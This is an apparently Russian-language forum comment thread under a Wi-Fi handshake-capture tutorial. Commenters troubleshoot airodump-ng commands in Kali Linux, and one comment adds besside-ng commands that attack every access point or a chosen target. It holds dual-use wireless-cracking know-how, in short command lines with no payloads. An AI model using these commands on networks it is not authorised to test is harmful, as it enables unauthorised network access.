26.10.2015 в 07:53
Что-то я не понял вас,автор. Airodump у вас определил BSSID роутера,как 00:14:BF:E0:E8:D5 канал 10. Далее вы пишете: Теперь напишите эту команду:

airodump-ng –c [channel] –bssid [bssid] –w /root/Desktop/ [monitor interface]
замените в ней все что находится в [ ] вашими данными.
После ваша команда должна выглядить примерно так.

airodump-ng -c 9 —bssid 00:13:BF:E0:E7:D8 -w /root/Desktop/ mon0

Почему канал стал девятым,а BSSID — 00:13:BF:E0:E7:D8 и далее везде фигурирует именно этот BSSID.

QWERTY
31.10.2015 в 16:18
А можно использовать кали линукс на виндовс

WI-FI
25.11.2015 в 20:18
Можно, сделав, например, загрузочную флешку или через виртуал бокс

VOVA
08.12.2015 в 15:14
Я новичок кали установил на виртуалку когда ввожу команду airmon-ng появляется вот ето скажите пожалуста в чом проблема?

PSYHOCODE
16.12.2015 в 03:27
внешний адаптер беспроводной сеть не работает на виртуалке

ВАНЯ
10.12.2015 в 03:31
Кстати с таким софтом и скоростью как в статье, реально годами ломать можно )))

BRUCE WAYNE ^^
22.12.2015 в 13:05
Проблемка . После ввода
airodump-ng -c [channel] –bssid [bssid] –w /root/Desktop/ [monitor interface]
пишет :
fopen failed: No such file or directory
Could not create «/root/Desktop/-01.csv».

я как понял ,не может создать -01.csv из-за не найденной дериктории .
Как исправить ?

PSYHOCODE
23.12.2015 в 01:32
airodump-ng -c [channel] –bssid [bssid] –w filename [monitor interface]
 
Мы что-то упустили? У вас есть вопросы?
Если бы статья называлась
"Отлов handshake wi-fi и его вероятная расшифровка",
то ничего не упустили )) В этом месте - улыбающийся смайлик. ( Без них скучновато. Куда они делись? Как вы их вставляете ?)
Взломать wi-fi можно не только подбором пароля.
Вообще, взлом аудит wi-fi - может включать немного больше мероприятий.

Но автор и сам это знает ))
Статья провокационная ? Только такие мысли рождаются на этом форуме после прочтения ))
 
Написано очень доходчиво особенно для новичков, добавлю одну команду для автоматизации процесса (если не важно от какой точки получить хеншейк) то после перевода карты в режим монитора вводим команду:
Код:
besside-ng (ваша картта в режиме монитора)
besside-ng wlan0mon
Если нужна определённая цель то команда будет выглядит так:
Код:
besside-ng -b (mac адрес цели) -i wlan0mon
besside-ng -R (имя ESSID цели) -i wlan0mon
besside-ng -c (номер канала на котором будет работа) -i wlan0mon
В последнем примере указав номер канала besside-ng будет атаковать все точки на этом канале.
 
У меня встроенный адаптер в ноут так не пишет(
Вам следует приобрести USB WiFi адаптер с чипсетом, который будет поддерживать данные функции. Большинство встроенных адаптеров не позволяют их использовать.
 
А какие есть возможные методы получения хэндшейка или получения доступа к вайфай. Если к этой точке почти никто не подключается.
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab